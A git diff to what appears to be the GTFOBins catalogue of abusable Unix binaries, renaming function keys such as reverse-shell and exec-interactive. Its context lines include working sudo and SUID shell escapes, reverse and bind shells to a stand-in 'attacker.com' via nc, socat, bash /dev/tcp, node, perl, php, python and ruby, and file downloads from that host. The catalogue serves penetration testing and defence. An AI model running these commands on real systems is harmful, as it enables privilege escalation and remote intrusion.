diff --git a/_data/functions.yml b/_data/functions.yml
index 7a3d5e9..c5d5771 100644
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -1,9 +1,9 @@
-exec-interactive:
- label: Interactive
+execute-interactive:
+ label: Interactive execute
description: It executes interactive commands that may be exploited to break out from restricted shells.
-exec-non-interactive:
- label: Non-interactive
+execute-non-interactive:
+ label: Non-interactive execute
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
suid-enabled:
@@ -26,18 +26,14 @@ upload:
label: Upload
description: It can exfiltrate files on the network.
-bind-shell:
- label: Bind shell
+bind-shell-interactive:
+ label: Interactive bind shell
description: It can bind a shell to a local port to allow remote network access.
-reverse-shell:
- label: Reverse shell
+reverse-shell-interactive:
+ label: Interactive reverse shell
description: It can send back a reverse shell to a listening attacker to open a remote network access.
-load-library:
- label: Library load
- description: It loads shared libraries that may be used to run code in the binary execution context.
-
bind-shell-non-interactive:
label: Non-interactive bind shell
description: It can bind a non-interactive shell to a local port to allow remote network access.
@@ -45,3 +41,7 @@ bind-shell-non-interactive:
reverse-shell-non-interactive:
label: Non-interactive reverse shell
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
+
+load-library:
+ label: Library load
+ description: It loads shared libraries that may be used to run code in the binary execution context.
diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index cfff65a..8963e7a 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: ash
sudo-enabled:
- code: sudo ash
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 1ae286b..c6fa9b7 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}'
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index d2b6f5c..4eb23cf 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: bash
sudo-enabled:
- code: sudo bash
@@ -34,7 +34,7 @@ functions:
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
- reverse-shell:
+ reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index e5890be..a112601 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: csh
sudo-enabled:
- code: sudo csh
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 5bf6f76..8b93d4d 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: dash
sudo-enabled:
- code: sudo dash
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index d0c7a6c..b85d737 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
ed
!/bin/sh
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index 2655229..b8bc630 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
index b3e014f..e0b5368 100644
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
index 9cd0f3d..421084a 100644
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: expect -c 'spawn /bin/sh;interact'
sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact'
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
index 433fadb..2305f6b 100644
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: find . -exec /bin/sh \; -quit
sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit
diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md
index 35e642e..c8647d6 100644
--- a/_gtfobins/ftp.md
+++ b/_gtfobins/ftp.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
ftp
!/bin/sh
diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md
index c1bd0fc..186c64e 100644
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: gdb -nx -ex '!sh' -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit
diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md
index bb95116..6866485 100644
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: ionice /bin/sh
sudo-enabled:
- code: sudo ionice /bin/sh
diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md
index 2edbb4e..84d96a4 100644
--- a/_gtfobins/ld.so.md
+++ b/_gtfobins/ld.so.md
@@ -7,7 +7,7 @@ description: |
/lib64/ld-linux-x86-64.so.2
```
functions:
- exec-interactive:
+ execute-interactive:
- code: /lib/ld.so /bin/sh
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh
diff --git a/_gtfobins/less.md b/_gtfobins/less.md
index 6a0d293..07f76c4 100644
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
less /etc/profile
!/bin/sh
diff --git a/_gtfobins/man.md b/_gtfobins/man.md
index f706b14..e25fa87 100644
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
man man
!/bin/sh
diff --git a/_gtfobins/more.md b/_gtfobins/more.md
index 73c0fd4..0e50f41 100644
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
TERM= more /etc/profile
!/bin/sh
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index c65aae2..f3d5e76 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -14,13 +14,13 @@ functions:
LPORT=12345
LFILE=where_to_save
nc -l -p $LPORT > "$LFILE"
- reverse-shell:
+ reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
- bind-shell:
+ bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
diff --git a/_gtfobins/node.md b/_gtfobins/node.md
index 67cb023..9c9aa35 100644
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
sudo-enabled:
@@ -9,7 +9,7 @@ functions:
suid-enabled:
- code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
- reverse-shell:
+ reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@@ -20,7 +20,7 @@ functions:
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
- bind-shell:
+ bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index d26420b..c423a7f 100644
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -1,12 +1,12 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
- reverse-shell:
+ reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 34b3ad4..d56499e 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -1,6 +1,6 @@
---
functions:
- exec-non-interactive:
+ execute-non-interactive:
- code: |
export CMD="ls /"
php -r 'system(getenv("CMD"));'
@@ -39,7 +39,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
- reverse-shell:
+ reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index 835f5a6..1b64190 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
@@ -22,7 +22,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
- reverse-shell:
+ reverse-shell-interactive:
- description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 3d9ffca..9342130 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
@@ -22,7 +22,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
- reverse-shell:
+ reverse-shell-interactive:
- description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index d52e84c..67d2f53 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index 5654fc5..5d9eee1 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 66b3cea..8335338 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: ruby -e 'exec "/bin/sh"'
sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"'
@@ -9,7 +9,7 @@ functions:
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
- reverse-shell:
+ reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
index 08ec9d1..870b69f 100644
--- a/_gtfobins/scp.md
+++ b/_gtfobins/scp.md
@@ -1,6 +1,6 @@
---
functions:
- exec-non-interactive:
+ execute-non-interactive:
- code: |
TF=$(mktemp)
CMD="id"
diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md
index bbd73f9..af80824 100644
--- a/_gtfobins/setarch.md
+++ b/_gtfobins/setarch.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: setarch $(arch) /bin/sh
sudo-enabled:
- code: sudo setarch $(arch) /bin/sh
diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md
index 0bcbaeb..ef10773 100644
--- a/_gtfobins/sftp.md
+++ b/_gtfobins/sftp.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
HOST=user@attacker.com
sftp $HOST
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 5418a54..e50102d 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -1,12 +1,12 @@
---
functions:
- reverse-shell:
+ reverse-shell-interactive:
- description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
- bind-shell:
+ bind-shell-interactive:
- description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.
code: |
LPORT=12345
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 831f0aa..774a9c2 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost /bin/bash --noprofile --norc
download:
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
index 1a23aa0..61374f4 100644
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: strace -o /dev/null /bin/sh
sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
index b7ed7d4..e823db5 100644
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md
index 9042146..78630bb 100644
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: taskset 1 /bin/sh
sudo-enabled:
- code: sudo taskset 1 /bin/sh
diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index c7ae1f4..f233314 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md
index f45e28a..bc48656 100644
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@@ -8,7 +8,7 @@ functions:
telnet $RHOST $RPORT
^]
!/bin/sh
- reverse-shell:
+ reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md
index 1c67ae5..41520ca 100644
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: vi -c ':!/bin/sh'
- code: |
vi
diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md
index 230c0e9..a65439e 100644
--- a/_gtfobins/wish.md
+++ b/_gtfobins/wish.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md
index 15cc1b3..1db7501 100644
--- a/_gtfobins/zsh.md
+++ b/_gtfobins/zsh.md
@@ -1,6 +1,6 @@
---
functions:
- exec-interactive:
+ execute-interactive:
- code: zsh
sudo-enabled:
- code: sudo zsh